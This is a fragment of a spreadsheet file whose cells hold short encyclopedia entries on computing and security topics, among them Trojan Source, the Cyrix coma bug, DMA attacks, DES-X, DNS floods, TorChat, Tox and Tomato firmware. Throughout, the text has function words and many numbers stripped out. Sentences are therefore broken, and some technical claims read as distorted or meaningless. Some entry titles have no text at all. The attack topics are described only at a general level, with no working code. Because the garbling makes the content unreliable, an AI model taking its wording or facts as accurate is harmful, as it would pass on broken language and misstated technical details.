data chunks stored upon multiple drives must assemble order access data, possible solution physical drive theft, provided drives stored multiple, individually secured locations, enough number drive used piece together meaningful information. neglected process adding physical barriers storage devices themselves. locked cases physically hidden drives, limited number personnel knowledge access keys locations, prove good first line physical theft. also references external links term fismapedia</t>
  </si>
  <si>
    <t>Trojan Source</t>
  </si>
  <si>
    <t>trojan source name software vulnerability abuses unicode's bidirectional characters order rearrange source code execution without changing visually. exploit utilizes writing scripts different reading directions displayed encoded computers. discovered nicholas boucher ross anderson cambridge university late 2021. background unicode encoding standard representing text, symbols, glyphs. unicode dominant encoding computers, used websites march 2022. supports many languages, this, must support different methods writing text. this requires support left-to-right languages english russian, right-to-left languages hebrew arabic. since unicode aims solve using writing system, must able scripts different display orders resolve conflicting orders. this, unicode contains characters called bidirectional characters (bidi) describe text displayed represented. these characters abused change text interpreted without changing visually, characters often invisible. methodology exploit, bidirectional characters abused reorder text source code simple strings actually reordered later executed interpreted. bidirectional characters inserted areas source code string literals allowed. this often applies documentation, variables, comments. example, mark (right-to-left isolate) forces following text interpreted reverse order: triple-quote first (ending string), followed semicolon (starting line), finally premature return (ending function, ignoring code it). line terminates mark, preventing flowing code. since source code editors ides show bidi characters themselves, human code reviewer would normally detect them. however, code inserted compiler, compiler correctly process characters, rearrange code order. when compiler finished, could potentially execute code appeared non-executable. formatting marks combined multiple times create complex attacks. impact mitigation programming languages support unicode strings follow unicode's bidi algorithm vulnerable exploit. this includes languages like java, c++, python, javascript.while attack strictly error, many compilers, interpreters, websites added warnings mitigations exploit. both llvm received requests deal exploit. marek polacek submitted patch shortly exploit published implemented warning potentially unsafe directional characters; functionality merged -wbidi-chars flag. llvm also merged similar patches. rust fixed exploit 1.56.1, rejecting code includes characters default. developers rust found vulnerable packages prior fix.red issued advisory website, labeling exploit "moderate".github released warning blog, well updating website show dialog bidi characters detected repository's code. references external links nist national vulnerability database common vulnerabilities exposures cve-2021-42574 nist (bidi exploit) cve-2021-42694 nist (homoglyph attack) unicode consortium bidirectional characters formatting unicode unicode consortium, describes vulnerability unicode proof concept nicholas boucher, exploits co-discoverer cert/cc vulnerability report trojan source research paper</t>
  </si>
  <si>
    <t>Tripwire (software)</t>
  </si>
  <si>
    <t>Triple fault</t>
  </si>
  <si>
    <t>computer architecture, triple fault special kind exception generated exception occurs trying invoke double fault exception handler, handles exceptions occurring trying invoke regular exception handler. processors beginning 80286 cause shutdown cycle occur triple fault encountered. this typically causes motherboard hardware initiate reset, which, turn, causes whole computer reboot. possible causes triple faults triple faults indicate problem operating system kernel device drivers. modern operating systems, triple fault typically caused buffer overflow underflow device driver writes interrupt descriptor table (idt). corrupted, next interrupt happens, processor unable call either needed interrupt handler double fault handler descriptors corrupted. virtual machines qemu, triple fault produces dump virtual machine console, instruction pointer instruction triggered first exception. when using intel vt-x, triple fault causes exit, exit reason exit reason saved vmcs handled software. other uses intel 80286 processor first processor introduce now-ubiquitous protected mode. however, could revert basic 8086-compatible "real mode" without resetting processor, done using hardware external cpu. compatibles, documented method special function intel 8042 keyboard controller, would assert reset processor. however, intentionally triple-faulting found cause transition occur much faster cleanly, permitting multitasking operating systems switch back forth high speed.some operating system kernels, linux, still triple faults last effort rebooting process acpi reboot fails. this done setting register issuing interrupt. since table length attempts access fail processor generates triple fault. references</t>
  </si>
  <si>
    <t>Cyberduck</t>
  </si>
  <si>
    <t>cyberduck open-source client sftp, webdav, cloud storage (openstack swift, amazon backblaze microsoft azure), available macos windows version 4.0) licensed gpl. cyberduck written java using cocoa user interface framework macos windows forms windows. supports ftp/tls (ftp secured ssl/tls), using auth well directory synchronization. user interacts user interface (gui), including file transfer drag drop notifications growl. also able open files external text editors. cyberduck includes bookmark manager supports apple's keychain bonjour networking. supports multiple languages including english, catalan, czech, chinese (traditional simplified), danish, dutch, finnish, french, german, hebrew, hungarian, indonesian, italian, japanese, korean, norwegian, polish, portuguese, russian, slovak, spanish, swedish, thai, turkish, ukrainian, welsh. cyberduck cyberduck creator also provides version command-line interface (cli), called duck, available windows, macos linux. website duck.sh. program used sftp-client, operations different cloud services. also comparison client software references external links official website portable cyberduck packaged portable application external drive. (mac only)</t>
  </si>
  <si>
    <t>Cydia</t>
  </si>
  <si>
    <t>cydia graphical user interface (advanced package tool) ios. enables user find install software authorized apple jailbroken iphones, ipads ipod touch devices. also refers digital distribution platform software accessed cydia software. most software packages available cydia free charge, although require purchasing. cydia developed freeman (named "saurik") company, saurikit. name "cydia" reference moth genus cydia, notably codling moth (cydia pomonella). purpose function cydia provides graphical user interface (gui) jailbroken users using advanced packaging tool package manager) repositories install software unavailable store. cydia based apt, ported part freeman's telesphoreo project.packages downloaded list repositories. packages installed list repositories user installed. apps installed location apple's applications, /applications directory. jailbroken devices also still download apps normally official store. some jailbreaking tools install cydia automatically, others not. software availablility some packages available cydia standard applications, packages extensions modifications interface apps ecosystem. some cydia repositories host open source packages well paid modifications jailbroken devices. these modifications based framework called cydia substrate (formally mobilesubstrate).many ports existing posix-compliant command line tools available cydia well, including bash, coreutils openssh, meaning device could potentially used full-fledged workstation, although missing development tools. cydia store march 2009, now-defunct blog tuaw (the unofficial apple weblog) announced cydia store, in-app software purchasing system cydia, opened sales. announcement also mentioned amazon payments option available, paypal would added future. paypal later became payment option well. cydia stopped accepting amazon payments 2015, leaving paypal sole payment option. after related paypal's digital token authorization discovered techcrunch, freeman decided shut cydia store december 2018. security risks jailbreaking mixed. advocates offer developer tools installed cydia help extra security. however, able install untrusted third-party software cause data loss malware. cydia detect installed packaged causes device become unresponsive, would reboot springboard non-apple packages temporarily disabled. history freeman first released cydia february 2008 open-source alternative installer.app iphone 1.1.in august 2009, wired reported freeman claimed million, percent million iphone ipod touch owners date, installed cydia.in september 2010, saurikit, llc, announced acquired rock your phone, inc. (makers rock.app). saurikit rock your phone largest providers third party apps time.on december 2010, saurikit filed dispute world intellectual property organization cykon technology limited kowloon, hong kong rights domain name "cydia.com", registered 2002. saurikit contended cykon registered domain name faith domain name incorporates saurikit's trademark. saurikit initially attempted purchase domain, demanded cykon forfeit domain cost asserting trademark rights followed bringing wipo proceeding. complaint denied wipo.as april 2011, cydia million annual revenue million weekly users according freeman's $250,000 annual profit.on august 2011,saurikit filed lawsuit hong kong owner cydia.com regarding domain name.on 2013, cydia substrate android operating system released supported android versions 4.3.on december 2013, cydia updated 7.1.on october 2014, chinese jailbreaking team, pangu team, released jailbreak 8.1. response, saurik quickly updated cydia 1.1.13, added support pushed update apt.saurik.com manual download.on february 2018, coolstar launched initial release electra, giving access cydia versions 11.0-11.1.2. alongside electra coolstar released several patches cydia, creating cydia version compatible electra jailbreak, electra released saurik still working updates cydia. saurik eventually released update, pushed update devices running cydia time. coolstar’s patched version cydia turned incompatible saurik’s update. also linux apple devices references external links media related cydia (software) wikimedia commons official website</t>
  </si>
  <si>
    <t>Tornado code</t>
  </si>
  <si>
    <t>coding theory, tornado codes class erasure codes support error correction. tornado codes require constant redundant blocks data-efficient reed–solomon erasure codes, much faster generate erasures faster. software-based implementations tornado codes times faster small lengths 10,000 times faster larger lengths reed–solomon erasure codes. since introduction tornado codes, many similar erasure codes emerged, notably online codes, codes raptor codes. tornado codes layered approach. layers except last ldpc error correction code, fast chance failure. final layer uses reed–solomon correction code, slower optimal terms failure recovery. tornado codes dictates many levels, many recovery blocks level, distribution used generate blocks non-final layers. overview input data divided blocks. blocks sequences bits size. recovery data uses block size input data. erasure block (input recovery) detected means. (for example, block disk pass check network packet given sequence number never arrived.) number recovery blocks given user. then number levels determined along number blocks level. number level determined factor less one. input blocks, first recovery level blocks, second b*b*n, third b*b*b*n, levels recovery except final ldpc, works (exclusive-or). operates binary values, different values values. given result determine value similarly, given result determine value this extends multiple values, given result values, missing value recovered. recovery blocks level input blocks. similarly, recovery blocks level blocks level one. blocks used chosen randomly, without repetition. however, number blocks xor'ed make recovery block chosen specific distribution level. since fast operation recovery blocks subset blocks input lower recovery level), recovery blocks generated quickly. final level reed–solomon code. reed–solomon codes optimal terms recovering failures, slow generate recover. since level fewer blocks before, reed–solomon code small number recovery blocks generate recovery. even though reed–solomon slow, small amount data handle. during recovery, reed–solomon code recovered first. this guaranteed work number missing blocks next-to-final level less present blocks final level. going lower, ldpc (xor) recovery level used recover level beneath high probability recovery blocks present level beneath missing fewer blocks recovery level. algorithm recovery find recovery block generating missing lower level. then recovery block blocks present equal missing block. patent issues tornado codes formerly patented inside united states america. patents us6163870 (filed 1997) 6081909 (filed 1997) describe tornado codes, expired november 2017. patents us6307487 (filed 1999) us6320520 (filed 1999) also mention tornado codes, expired february 2019, september 2019, respectively. citations michael luby created tornado codes. external links readable description (postscript) another luby international computer science institute (postscript) [2]. also raptor code erasure code notes references mitzenmacher (2004). "digital fountains: survey look forward". proc. 2004 ieee information theory workshop (itw). luby, mitzenmacher, shokrollahi, spielman, stemann (1997). "practical loss-resilient codes". proceedings twenty-ninth annual symposium theory computing: 150–159.{{cite journal}}: maint: multiple names: authors list (link) luby, mitzenmacher, shokrollahi (1998). "analysis random processes and-or tree evaluation". proceedings annual acm-siam symposium discrete algorithms: 364–373.{{cite journal}}: maint: multiple names: authors list (link)</t>
  </si>
  <si>
    <t>Cyrix coma bug</t>
  </si>
  <si>
    <t>cyrix coma design flaw cyrix 6x86 (introduced 1996), 6x86l, early 6x86mx processors allows non-privileged program hang computer. discovery according andrew balsa, around time discovery f00f intel pentium, serguei shtyliov moscow found flaw cyrix processor developing disk driver assembly language. alexandr konosevich, omsk, researched coauthored article post german technology magazine c't, calling "hidden bug" (cli instruction disables interrupts architecture). balsa, member linux kernel mailing list, confirmed following program (which uses inline x86-specific assembly language) could compiled unprivileged user: execution program renders processor completely useless rebooted, enters infinite loop cannot interrupted. this allows user access cyrix system perform denial-of-service attack. similar execution halt catch fire instruction, although coma particular instruction. analysis what causes interrupt mask, interrupts explicitly disabled. instead, anomaly cyrix's instruction pipeline prevents interrupts serviced duration loop; since loop never ends, interrupts never serviced. xchg instruction atomic, meaning instructions allowed change state system executed. order ensure atomicity, designers cyrix made xchg uninterruptible. pipelining branch predicting, however, another xchg enters pipeline previous completes, causing deadlock. workarounds unintentional instances insert another instruction loop, instruction good candidate. cyrix suggested serializing xchg opcode, thus bypassing pipeline. however, techniques serve prevent deliberate attacks. prevent enable 0x10 configuration register ccr1. this disables implicit locking normally done xchg instruction. since cpus affected designed work multi-processor systems, loss xchg atomicity harmless. also pentium f00f halt catch fire notes external links andrew balsa's early description cx6x86 registers (and undocumented features)</t>
  </si>
  <si>
    <t>DARPA Quantum Network</t>
  </si>
  <si>
    <t>darpa quantum network (2002–2007) world's first quantum distribution (qkd) network, operating optical nodes across boston cambridge, massachusetts. became fully operational october 2003 bbn's laboratories, june 2004 fielded dark fiber streets cambridge boston, continuously years. project also created fielded world's first superconducting nanowire single-photon detector. sponsored darpa part quist program, built operated technologies close collaboration colleagues harvard university boston university photonics center. darpa quantum network fully compatible standard internet technology, could provide qkd-derived material create virtual private networks, support ipsec authentication, purpose. control mechanisms protocols implemented unix kernel field-programmable gate arrays. qkd-derived material routinely used video-conferencing applications. darpa quantum network built stages. project's first year (year designed built full system (alice bob), attenuated laser source mean photon number) running telecom fiber, phase-modulated actively stabilized mach-zender interferometer. also implemented full suite industrial-strength protocols based bb84. year created 'mark versions system nodes) commercial-quality ingaas detectors created research. these nodes continuously bbn's laboratory october 2003, deployed harvard boston university june 2004, network began running continuously across metro boston area, 24x7. year network expanded nodes addition entanglement-based system (derived work boston university) designed telecom fibers, high-speed atmospheric (freespace) link designed built national institute standards technology. year added second freespace link overall network, using nodes created qinetiq, investigated improved protocols detectors. finally, year added world's first superconducting nanowire single-photon detector operational network. created collaboration researchers bbn, university rochester, national institute standards technology; first system faster existing single-photon detector telecom wavelengths. final year, also collaborated researchers massachusetts institute technology implement, experiment with, proof-of-concept version world's first quantum eavesdropper (eve).when fully built, network's nodes follows. bbn's quantum distribution quantum network protocols inter-operated achieve any-to-any distribution. alice, mhz, attenuated laser pulses telecom fiber, phase-modulated anna, boris mhz, attenuated laser pulses telecom fiber, phase-modulated alex, barb entanglement based photons telecom fiber, polarization-modulated ali, baba approximately mhz, attenuated laser pulses atmosphere, polarization-modulated amanda, brian attenuated laser pulses atmosphere, polarization-modulatedthe darpa quantum network implemented variety quantum distribution protocols, explore properties. integrated single, production-quality protocol stack. authentication based public keys, shared private keys, combination two. (the shared private keys could refreshed qkd-derived keys.) privacy amplification implemented gf[2n] universal hash. entropy estimation based rényi entropy, implemented bbbss slutsky, myers pearson, shor preskill protocols. error correction implemented variant cascade protocol, niagara protocol provided efficient, one-pass operation near shannon limit forward error correction based low-density parity-check codes (ldpc). sifting performed either traditional methods, run-length encoding, so-called "sarg" sifting. also implemented major forms networking protocols. first, relay employed "trusted" nodes network relay materials distillation endpoints. this approach permitted nodes agree upon shared material even implemented incompatible technologies; example, node based phase-modulation fiber could exchange keys based polarization-modulation atmosphere. fact, even permitted transmitters share material (compatible incompatible) transmitters. furthermore, material could routed multiple "striped" paths network (e.g. disjoint paths) recombined end-to-end, thus erasing advantage would gain controlling network nodes along way. second, qkd-aware optical routing protocols enabled nodes control transparent optical switches within network, multiple systems could share optical network infrastructure. selected papers "building quantum network", chip elliott, journal physics, july 2002. "quantum cryptography practice", chip elliott, david pearson, gregory troxel, sigcomm 2002. "path-length control interferometric link", chip elliott, oleksiy pikalo, john schlafer, greg troxel, proceedings aerosense 2003, volume 5105, quantum information computation, 2003. "the darpa quantum network", chip elliott, december 2004. "current status darpa quantum network", chip elliott, alexander colvin, david pearson, oleksiy pikalo, john schlafer, henry yeh, spie defense commercial sensing 2005. "building network theories devices" (slide presentation), david pearson, "the darpa quantum network", elliott, quantum communications cryptography, edited alexander sergienko, press, 2005. optimal mean photon number quantum cryptography", david pearson chip elliott, computer science quantum computing, edited james stones, nova science publishers, 2007. darpa quantum network testbed: final technical report, chip elliott henry yeh, technologies, july 2007. "the networking quantum networking", chip elliott, 2018. references</t>
  </si>
  <si>
    <t>TorChat</t>
  </si>
  <si>
    <t>torchat peer-to-peer anonymous instant messenger used onion services underlying network. provided cryptographically secure text messaging file transfers. characteristics tor's onion services ensure traffic clients encrypted difficult tell communicating given client physically located. torchat free software licensed terms general public license (gpl). features torchat every user unique alphanumeric consisting characters. this randomly created client started first time, basically .onion address onion service. torchat clients communicate using contact other's onion service (derived exchanging status information, chat messages data connection. since onion services receive incoming connections even behind router network address translation (nat), torchat need port forwarding work. history first public version torchat released november 2007 bernd kreuss (prof7bit). written python used cross-platform widget toolkit wxpython made possible support wide range platforms operating systems. older windows versions torchat built py2exe (since 0.9.9.292 replaced pyinstaller) came bundled copy readily configured could portable application right flash drive without installation, configuration account creation. between 2008 2010 updated packages, resulting bundled version becoming obsolete unable connect network, reason appearance forks basically replaced bundled tor.exe current one. december 2010, official update finally became available that, among minor bugfixes, also included up-to-date tor.exe.after 2014, development activity stopped torchat received updates. forks fork released summer 2010 french developer. binary cocoa application) source-code (objective-c) bundled xcode project downloaded sourcemac. rewrite torchat protocol java created beginning 2012, called jtorchat google code. containing latest tor.exe, meant emulate features original torchat protocol, well extending protocols jtorchat-specific features. filesharing, implemented original torchat, implemented jtorchat. capability jtorchat broadcast mode, allows user send messages everybody network, even buddylist. also buddy request mode implemented, allows user request random user jtorchat network them. stage jtorchat designed work effectively windows without configuration, however since written java, platform supported both, java itself, making portable. project actively seeking java contributors, especially help debug interface. february 2012, developer prof7bit moved torchat github, protest google selectively censoring access torchat download certain countries. prof7bit switched working torchat2, rewrite scratch, using lazarus free pascal. security 2015 security analysis torchat protocol python implementation conducted. found although design torchat sound, implementation several flaws, make torchat users vulnerable impersonation, communication confirmation denial-of-service attacks. despite flaws found, torchat might still secure scenario peer's onion address become known adversary interested attacking person behind torchat address. also bitmessage briar (software) (anonymity network) ricochet (software) references external links torchat github torchat jtorchat github</t>
  </si>
  <si>
    <t>DEAL</t>
  </si>
  <si>
    <t>cryptography, deal (data encryption algorithm larger blocks) symmetric block cipher derived data encryption standard (des). design proposed report lars knudsen 1998, submitted contest richard outerbridge (who notes knudsen presented design conference 1997). deal feistel network uses round function. 128-bit block size variable size either 128, 192, bits. sizes bits, cipher uses rounds, increasing 256-bits size. scheme comparable performance triple des, relatively slow compared many candidates. also ladder-des luby–rackoff block cipher external links original deal report scan's entry deal presentation slides (pdf) references john kelsey, bruce schneier (august 1999). key-schedule cryptanalysis deal (pdf/postscript). annual international workshop selected areas cryptography (sac '99). kingston, ontario: springer-verlag. 118–134. retrieved 2007-08-23. stefan lucks: security 128-bit block cipher deal. fast software encryption 1999: 60–70</t>
  </si>
  <si>
    <t>DES-X</t>
  </si>
  <si>
    <t>cryptography, des-x desx) variant (data encryption standard) symmetric-key block cipher intended increase complexity brute-force attack using technique called whitening. original algorithm specified 1976 56-bit size: possibilities key. there criticism exhaustive search might within capabilities large governments, particularly united states' national security agency (nsa). scheme increase size without substantially altering algorithm des-x, proposed rivest 1984. algorithm included security's bsafe cryptographic library since late 1980s. des-x augments xoring extra bits (k1) plaintext applying des, xoring another bits (k2) encryption: des-x {\displaystyle {\mbox{des-x}}(m)=k_{2}\oplus {\mbox{des}}_{k}(m\oplus k_{1})} size thereby increased bits. however, effective size (security) increased 56+64−1−lb(m) lb(m) ~119 bits, number chosen plaintext/ciphertext pairs adversary obtain, denotes binary logarithm. moreover, size drops bits given 232.5 known plaintext using advanced slide attack. des-x also increases strength differential cryptanalysis linear cryptanalysis, although improvement much smaller case brute force attacks. estimated differential cryptanalysis would require chosen plaintexts (vs. des), linear cryptanalysis would require known plaintexts (vs. independent subkeys.) note plaintexts (known chosen case), indeed block cipher block size) totally broken whole cipher's codebook becomes available. although differential linear attacks, currently best attack des-x known-plaintext slide attack discovered biryukov-wagner complexity 232.5 known plaintexts 287.5 time analysis. moreover attack easily converted ciphertext-only attack data complexity offline time complexity. also g-des meet-in-the-middle attack triple xor–encrypt–xor references kilian phillip rogaway, protect exhaustive search(pdf), advances cryptology crypto '96, springer-verlag (1996), 252–267. rogaway, security desx (postscript), cryptobytes 2(2) (summer 1996). external links entry</t>
  </si>
  <si>
    <t>DESCHALL Project</t>
  </si>
  <si>
    <t>deschall, short challenge, first group publicly break message used data encryption standard (des), becoming $10,000 winner first challenges proposed security 1997. established group computer scientists rocke verser assisted justin dolske matt curtin involved thousands volunteers software background machines, connected internet. they announced success june days challenge announced january background search quadrillion possible keys 56-bit using conventional computers considered impractical even 1990s. rocke verser already efficient algorithm standard idea involving spare time hundreds machines connected internet. server 486-based ps/2 56mb memory announced project usenet towards march. client software rapidly written large variety home machines eventually powerful systems. there main contenders: soinet swedish group), group silicon graphics, manufacturer high-performance computers, lead late day. other groups using supercomputers withdrew flood attacks networks. project with software used, single pentium system able test approximately million keys/second nothing else. rate would take around 2,285 years search entire key-space. number computers used rose rapidly end, total 78,000 different addresses recorded, maximum 14,000 unique hosts 24-hour period. time found, searched quarter key-space searching billion keys second, number participants still increasing rapidly. solution was: strong cryptography makes world safer place. owner computer found solution awarded $4,000 prize, rest going originator project. conclusion paper describing project demonstrated brute-force search keyspace possible, also becoming practical even modestly funded groups. rsa's prize find us$10,000; safe inadequate protecting data greater value." also brute force: cracking data encryption standard distributed.net factoring challenge secret-key challenge footnotes references matt curtin (2005). brute force. springer-verlag, york. external links archive project material archived 2010-03-25 wayback machine deschall home page press release announcing success</t>
  </si>
  <si>
    <t>DIY Kindle Scanner</t>
  </si>
  <si>
    <t>kindle scanner, yourself kindle scanner, robotic device made lego mindstorms designed built peter purgathofer 2012 2013. robot interfaces purgathofer's personal computer kindle make copy kindle e-book. this robot effect bypasses digital rights management system place protect kindle e-books. background peter purgathofer associate professor vienna university technology austria. when released video vimeo documenting operation device, purgathofer wrote project meant artistic reflection connecting ideas “book scanning, copyright, digital rights management.” reply email, purgathofer stated project meant negative reaction kindle e-books, rather lego mindstorms kindle neither usually intended used. operation robot first operate computer well hold kindle. image capture software must already running computer kindle must open first page book scanned computer. robot runs loop hits spacebar activate camera computer uses finger-like robotic appendages turn next page kindle. this loop repeated pages scanned computer. optical character recognition (ocr) software used convert scanned images duplicate original kindle e-book plain text file. reaction several critics recognized direct means bypassing digital rights management available. context, kindle scanner labeled type rube goldberg machine.additionally, cory doctorow made claim project fact legal means bypassing digital rights management. this claim supported argument kindle scanner simply exploits analog hole applicable digital rights management systems.in light question legality project, purgathofer scanned e-book method explains shared copy anyone worried would deep trouble."furthermore, purgathofer states project associated academic work. explanation, said, "it’s private project." references general references "diy kindle scanner", post-digital publishing archive. retrieved october 2015. hoffelder, nate. "kindle plus legos plus equals scanner (video)", digital reader. retrieved october 2015. love, dylan. "this lego robot outwit amazon's kindle make copies your e-books", business insider. retrieved october 2015.</t>
  </si>
  <si>
    <t>Tox (protocol)</t>
  </si>
  <si>
    <t>peer-to-peer instant-messaging video-calling protocol offers end-to-end encryption. stated goal project provide secure easily accessible communication everyone. reference implementation protocol published free open-source software terms gpl-3.0-or-later. history initial commit github pushed june 2013, user named irungentoo. pre-alpha testing binaries made available users february 2014, onward. july 2014, entered alpha stage development redesigned download page created occasion. features encryption traffic users assigned public private key, connect directly fully distributed, peer-to-peer network. users ability message friends, join chat rooms friends strangers, voice/video chat, send files. traffic end-to-end encrypted using nacl library, provides authenticated encryption perfect forward secrecy. revealing address friends makes attempt cloak address communicating friends, whole point peer-to-peer network connect directly friends. workaround exist form tunneling connections tor. however, non-friend user cannot easily discover address using reveal address someone contacts list. additional messaging features clients provide support various secure anonymised communication features; every client supports messaging, additional features like group messaging, voice video calling, voice video conferencing, typing indicators, message read-receipts, file sharing, profile encryption, desktop streaming supported various degrees mobile desktop clients. additional features implemented client long supported core protocol. features related core networking system left client. client developers strongly encouraged adhere client standard order maintain cross-client compatibility uphold best security practices. usability instant messenger though several apps protocol seem similar function regular instant messaging apps, lack central servers similar xmpp matrix currently consequence parties chat need online message sent received. enabled messengers deal separate ways, prevent user sending message party disconnected others show message sent reality stored sender's phone waiting delivered receiving party reconnects network. architecture core core library establishing protocol api. user front-ends, clients, built core. anyone create client utilizing core. technical documents describing design core, written core developer irungentoo, available publicly. protocol core implementation protocol, example application layer model arguably presentation layer. implementations protocol done project exist.tox uses opus audio format audio streaming video compression format video streaming. encryption uses cryptographic primitives present nacl crypto library, libsodium. specifically, employs curve25519 exchanges, xsalsa20 symmetric encryption, poly1305 macs. because protocol used many different applications, network broadcasts used client, also possible clients additional encryption sending clients support features. clients client program uses core library communicate users protocol. various clients available wide range systems; following list incomplete. there also protocol plugins pidgin longer maintained, working 2018-03-30) miranda disassociation foundation july 2015, developers officially announced disassociation foundation, dispute misuse donated funds" foundation head ceo, according lwn.net. domains control foundation, main development project transferred infrastructure, servers, domain. reception received significant publicity early conceptual stage, catching attention global online tech news sites. august 2013, number five github's trending list. concerns metadata leaks raised, developers responded implementing onion routing friend-finding process. accepted google summer code mentoring organization 2014 2015. also comparison instant messaging clients comparison instant messaging protocols comparison voip software list free open-source software packages references external links official website</t>
  </si>
  <si>
    <t>DMA attack</t>
  </si>
  <si>
    <t>attack type side channel attack computer security, attacker penetrate computer device, exploiting presence high-speed expansion ports permit direct memory access (dma). included number connections, lets connected device (such camcorder, network card, storage device useful accessory internal card) transfer data computer maximum speed possible, using direct hardware access read write directly main memory without operating system supervision interaction. legitimate uses devices wide adoption accessories connections, attacker equally facility create accessory connect using port, potentially gain direct access part physical memory address space computer, bypassing security mechanisms lock screen, read computer doing, steal data cryptographic keys, install spyware exploits, modify system allow backdoors malware. preventing physical connections ports prevent attacks. many computers, connections implementing also disabled within bios uefi unused, depending device nullify reduce potential type exploit. examples connections allow exploitable form include firewire, cardbus, expresscard, thunderbolt, 4.0, pci, pci-x, express. description modern operating systems, non-system (i.e. user-mode) applications prevented accessing memory locations explicitly authorized virtual memory controller (called memory management unit (mmu)). addition containing damage caused software flaws allowing efficient physical memory, architecture forms integral part security operating system. however, kernel-mode drivers, many hardware devices, user-mode vulnerabilities allow direct, unimpeded access physical memory address space. physical address space includes main system memory, well memory-mapped buses hardware devices (which controlled operating system reads writes ordinary ram). ohci 1394 specification allows devices, performance reasons, bypass operating system access physical memory directly without security restrictions. sbp2 devices easily spoofed, making possible trick operating system allowing attacker read write physical memory, thereby gain unauthorised access sensitive cryptographic material memory.systems still vulnerable attack external device firewire, expresscard, thunderbolt expansion port that, like express general, connects attached devices directly physical rather virtual memory address space. therefore, systems firewire port still vulnerable pcmcia/cardbus/pc card expresscard port would allow expansion card firewire installed. uses attacker could, example, social engineering attack send "lucky winner" rogue thunderbolt device. upon connecting computer, device, direct unimpeded access physical address space, would able bypass almost security measures ability read encryption keys, install malware, control system devices. attack also easily executed attacker physical access target computer. addition abovementioned nefarious uses, beneficial uses features used kernel debugging purposes.there tool called inception attack, requiring machine expansion port susceptible attack. another application known exploit vulnerability gain unauthorized access running windows, linux computers spyware finfirewire. mitigations attacks prevented physical security potentially malicious devices. kernel-mode drivers many powers compromise security system, care must taken load trusted, bug-free drivers. example, recent 64-bit versions microsoft windows require drivers tested digitally signed microsoft, prevent non-signed drivers installed. iommu technology applies concept virtual memory system busses, used close security vulnerability well increase system stability). intel brands iommu vt-d. brands iommu amd-vi. linux windows supports iommus block transactions allowed. newer operating systems take steps prevent attacks. recent linux kernels include option disable firewire devices allowing functions. windows prevent access ports unattended machine console locked. 2019, major vendors taken account variety ways malicious device could take advantage complex interactions multiple emulated peripherals, exposing subtle bugs vulnerabilities.never allowing sensitive data stored unencrypted another mitigation venue attacks. however, protection reading ram's content enough, writing compromise seemingly secure storage outside code injection. example latter kind attack tresor-hunt, exposes cryptographic keys never stored (but certain registers); tresor-hunt achieves overwriting parts operating system.microsoft recommends changes default windows configuration prevent concern. also firewire security issue cold boot attack control attack references external links 0wned ipod hacking firewire presentation maximillian dornseif pacsec/core04 conference, japan, 2004 physical memory attacks firewire/dma part overview mitigation (update)</t>
  </si>
  <si>
    <t>Tomoyo Linux</t>
  </si>
  <si>
    <t>tomoyo linux (stylised tomoyo linux) linux kernel security module implements mandatory access control (mac). overview tomoyo linux implementation linux used increase security system, also useful purely systems analysis tool. launched march 2003 sponsored data corporation march 2012.tomoyo linux focuses system behaviour. tomoyo linux allows process declare behaviours resources needed achieve purpose. when protection enabled, tomoyo linux restricts process behaviours resources allowed administrator. features main features tomoyo linux include: system analysis increased security mandatory access control automatic policy generation simple syntax ease history versions tomoyo merged linux kernel mainline version 2.6.30 (2009, june 10)/ currently four standard linux security modules (lsm), along selinux, apparmor smack. tomoyo linux project started patch linux kernel provide mac. porting tomoyo linux mainline linux kernel required introduction hooks designed developed specifically support selinux label-based approach. however, hooks needed integrate remaining functionality tomoyo linux. consequently, project following parallel development lines: references external links comparison chart comparison chart tomoyo 1.x, 2.x, akari tomoyo linux project tomoyo linux embedded linux wiki tomoyo linux pathname-based security tomoyo debian wiki tomoyo linux archwiki</t>
  </si>
  <si>
    <t>DNS Flood</t>
  </si>
  <si>
    <t>flood type denial-of-service attack. process whereby traffic network resource machine stopped time. offender sends great number requests resource machine might become unavailable might reach during flood host connects internet disrupted overload traffic. referred disruption causes work resource machine halt allowing traffic land this attack mainly done hackers benefit attacked resource machine. ddos attacks perpetrated many reasons, including blackmailing website owners knocking websites, including high-profile sites large bank websites.many methods adopted prevent types attacks include dropping malformed packages, filters avoid receiving packages sources potential attack, timing half open connections greater hostility. also syn, icmp, lower levels prevent ddos attacks harming one's network. references</t>
  </si>
  <si>
    <t>Tomato (firmware)</t>
  </si>
  <si>
    <t>tomato family community-developed, custom firmware consumer-grade computer networking routers gateways powered broadcom chipsets. firmware continually forked modded multiple individuals organizations, up-to-date fork provided freshtomato project. history tomato originally released jonathan zarate 2006, using linux kernel drawing extensively code hyperwrt. targeted many popular routers time, notably older linksys wrt54g series, buffalo airstation, asus routers netgear wnr3500l. final release original tomato firmware came june 2010, point popularity grown large enough development support continued user community, resulting series releases (dubbed "mods") individual users teams continues present day. fedor kozhevnikov created notable early called tomatousb, ceased development november 2010. forked developers remains nearest common ancestor forks recent activity. project boost recognition tomato chosen asus base used build firmware currently preinstalled entire line home routers, asuswrt.currently, freshtomato appears project seen active development releases. features several notable features part tomato long enough common forks, among are: graphical user interface (accessed browser), including: access almost entirety features provided hardware (manufacturers typically omit many firmware prevent misuse reduce support costs) extensive ajax display settings germane device's current setup, reducing confusion keeping related options near using fewer pages/tabs css-based custom interface theming svg-based graphical bandwidth monitoring, showing total network inbound/outbound activity connected device charts line graphs update real-time personal server (nginx) uses device's "always always connected" design allow users host websites home free access bandwidth restriction configurable device network whole, providing control speed amount traffic available time device unrestricted access internal system logs ability store easier troubleshooting security audits access (busybox) web-based interface, well telnet (using dropbear) wake-on-lan advanced qos: unique classes defined, real-time graphs display prioritized traffic traffic class details client bandwidth control classes dnsmasq software built-in, provides: dhcp server (with static allocation addresses) local server (usually forwarding requests provider choice) wireless modes: access point (ap) wireless client station (sta) wireless ethernet (wet) bridge wireless distribution system (wds also known wireless bridging) simultaneous (also known wireless repeating) dynamic service ezupdate services extended providers button control jffs2 client wireless adjustment radio transmit power, antenna selection, wireless channels 'boot wait' protection (increase time slot uploading firmware boot loader) advanced port forwarding, redirection, triggering upnp nat-pmp init, shutdown, firewall, scripts uptime, load average, free memory status minimal reboots very configuration changes require reboot wireless survey page view networks neighborhood more comprehensive dashboard stock firmware: displays signal strengths wireless client devices, reveals upnp mappings configuration persistence firmware upgrade feature comparison feature comparison (cont.) also list wireless router firmware projects references external links official website virtual tomato (victek mod) tomato phoenix (mod supports chips, mt7620 mt7621 mt7628 mt7688) tomato shibby advancedtomato freshtomato-arm/freshtomato-mips freshtomato hardware compatibility list tomatoanon (up-to-date statistics active tomato devices fork/version)</t>
  </si>
  <si>
    <t>DNS leak</t>
